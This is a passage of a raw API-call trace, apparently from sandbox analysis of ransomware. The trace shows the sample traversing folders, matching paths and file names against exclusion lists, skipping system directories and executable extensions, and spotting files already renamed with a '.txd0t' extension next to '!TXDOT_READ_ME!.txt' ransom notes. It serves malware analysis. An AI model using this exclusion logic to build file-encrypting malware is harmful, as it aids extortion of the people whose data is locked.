[0115.791] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0115.791] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0115.791] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0115.791] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0115.791] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0115.791] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0115.791] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0115.791] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0115.791] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0115.795] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0115.796] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0115.796] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0115.796] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0115.801] FindClose (in: hFindFile=0xec1930 | out: hFindFile=0xec1930) returned 1 [0115.801] GetProcessHeap () returned 0xe30000 [0115.829] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68410a0 | out: hHeap=0xe30000) returned 1 [0115.830] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58430009, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58430009, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1036", cAlternateFileName="")) returned 1 [0115.830] StrCmpW (psz1="1036", psz2=".") returned 1 [0115.830] StrCmpW (psz1="1036", psz2="..") returned 1 [0115.834] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0115.834] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0115.834] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1036", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1036") returned="C:\\588bce7c90097ed212\\1036" [0115.834] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\windows\\system32\\") returned 0x0 [0115.834] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\windows\\syswow64\\") returned 0x0 [0115.834] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\windows\\system\\") returned 0x0 [0115.834] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\windows\\winsxs\\") returned 0x0 [0115.834] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\appdata\\roaming\\") returned 0x0 [0115.834] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\appdata\\local\\") returned 0x0 [0115.834] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\appdata\\locallow\\") returned 0x0 [0115.834] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\all users\\microsoft\\") returned 0x0 [0115.834] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\inetpub\\logs\\") returned 0x0 [0115.834] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch=":\\boot\\") returned 0x0 [0115.834] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch=":\\perflogs\\") returned 0x0 [0115.863] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch=":\\programdata\\") returned 0x0 [0115.863] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch=":\\drivers\\") returned 0x0 [0115.877] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch=":\\wsus\\") returned 0x0 [0115.877] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch=":\\efstmpwp\\") returned 0x0 [0115.885] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch=":\\$recycle.bin\\") returned 0x0 [0115.886] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="crypt_detect") returned 0x0 [0115.886] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="cryptolocker") returned 0x0 [0115.889] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="ransomware") returned 0x0 [0115.889] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="C:\\WINDOWS") returned 0x0 [0115.890] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="C:\\Program Files (x86)") returned 0x0 [0115.890] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="C:\\Program Files") returned 0x0 [0115.890] GetProcessHeap () returned 0xe30000 [0115.905] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x68410a0 [0115.905] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1036", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036") returned="C:\\588bce7c90097ed212\\1036" [0115.905] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\*") returned="C:\\588bce7c90097ed212\\1036\\*" [0115.905] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1036\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58430009, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58430009, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1df0 [0115.919] StrCmpW (psz1=".", psz2=".") returned 0 [0115.919] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58430009, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58430009, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0115.919] StrCmpW (psz1="..", psz2=".") returned 1 [0115.919] StrCmpW (psz1="..", psz2="..") returned 0 [0115.940] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x582d8947, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x582d8947, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x582d8947, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0115.940] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0115.940] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0115.940] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1036", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036") returned="C:\\588bce7c90097ed212\\1036" [0115.940] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\") returned="C:\\588bce7c90097ed212\\1036\\" [0115.940] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1036\\!TXDOT_READ_ME!.txt" [0115.940] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0115.940] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0115.940] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0115.940] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0115.940] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0115.940] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0115.940] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0115.940] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0115.940] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0115.940] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0115.940] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0115.940] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0115.940] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0115.940] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0115.940] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0115.940] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0115.940] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x582d8947, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xfc6, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0115.940] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0115.940] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0115.940] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1036", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036") returned="C:\\588bce7c90097ed212\\1036" [0115.941] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\") returned="C:\\588bce7c90097ed212\\1036\\" [0115.941] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1036\\eula.rtf.txd0t" [0115.941] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0115.941] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0115.941] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x58430009, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x14612, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0115.941] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0115.941] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0115.941] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1036", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036") returned="C:\\588bce7c90097ed212\\1036" [0115.941] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\") returned="C:\\588bce7c90097ed212\\1036\\" [0115.941] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml.txd0t" [0115.941] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0115.941] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0115.941] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0115.941] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0115.941] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0115.941] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1036", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036") returned="C:\\588bce7c90097ed212\\1036" [0115.941] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\") returned="C:\\588bce7c90097ed212\\1036\\" [0115.941] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1036\\SetupResources.dll" [0115.941] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0115.941] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0115.941] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0115.941] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0115.941] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0115.941] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0115.942] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0115.942] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0115.942] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0115.942] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0115.942] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0115.942] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0115.942] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0115.942] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0115.942] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0115.942] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0115.942] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0115.942] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0115.942] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0115.942] FindClose (in: hFindFile=0xec1df0 | out: hFindFile=0xec1df0) returned 1 [0115.942] GetProcessHeap () returned 0xe30000 [0115.942] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68410a0 | out: hHeap=0xe30000) returned 1 [0115.942] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58430009, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58430009, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1037", cAlternateFileName="")) returned 1 [0115.942] StrCmpW (psz1="1037", psz2=".") returned 1 [0115.942] StrCmpW (psz1="1037", psz2="..") returned 1 [0115.942] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0115.942] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0115.942] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1037", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1037") returned="C:\\588bce7c90097ed212\\1037" [0115.942] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\windows\\system32\\") returned 0x0 [0115.942] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\windows\\syswow64\\") returned 0x0 [0115.942] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\windows\\system\\") returned 0x0 [0115.942] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\windows\\winsxs\\") returned 0x0 [0115.942] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\appdata\\roaming\\") returned 0x0 [0115.943] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\appdata\\local\\") returned 0x0 [0115.943] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\appdata\\locallow\\") returned 0x0 [0115.943] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\all users\\microsoft\\") returned 0x0 [0115.943] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\inetpub\\logs\\") returned 0x0 [0115.943] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch=":\\boot\\") returned 0x0 [0115.943] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch=":\\perflogs\\") returned 0x0 [0115.943] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch=":\\programdata\\") returned 0x0 [0115.943] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch=":\\drivers\\") returned 0x0 [0115.943] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch=":\\wsus\\") returned 0x0 [0115.943] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch=":\\efstmpwp\\") returned 0x0 [0115.943] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch=":\\$recycle.bin\\") returned 0x0 [0115.943] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="crypt_detect") returned 0x0 [0115.943] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="cryptolocker") returned 0x0 [0115.943] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="ransomware") returned 0x0 [0115.943] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="C:\\WINDOWS") returned 0x0 [0115.943] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="C:\\Program Files (x86)") returned 0x0 [0115.943] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="C:\\Program Files") returned 0x0 [0115.943] GetProcessHeap () returned 0xe30000 [0115.943] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x68410a0 [0115.943] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1037", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037") returned="C:\\588bce7c90097ed212\\1037" [0115.943] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\*") returned="C:\\588bce7c90097ed212\\1037\\*" [0115.943] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1037\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58430009, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58430009, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1c70 [0115.944] StrCmpW (psz1=".", psz2=".") returned 0 [0115.944] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58430009, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58430009, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0115.944] StrCmpW (psz1="..", psz2=".") returned 1 [0115.944] StrCmpW (psz1="..", psz2="..") returned 0 [0115.944] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x582fef30, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x582fef30, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58324e32, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0115.944] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0115.944] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0115.944] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1037", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037") returned="C:\\588bce7c90097ed212\\1037" [0115.944] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\") returned="C:\\588bce7c90097ed212\\1037\\" [0115.944] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1037\\!TXDOT_READ_ME!.txt" [0115.944] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0115.944] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0115.944] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0115.944] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0115.944] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0115.944] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0115.944] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0115.944] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0115.944] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0115.945] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0115.945] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0115.945] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0115.945] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0115.945] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0115.945] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0115.945] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0115.945] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x582fef30, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1cc3, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0115.945] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0115.945] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0115.945] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1037", cchMax=1078 | out: 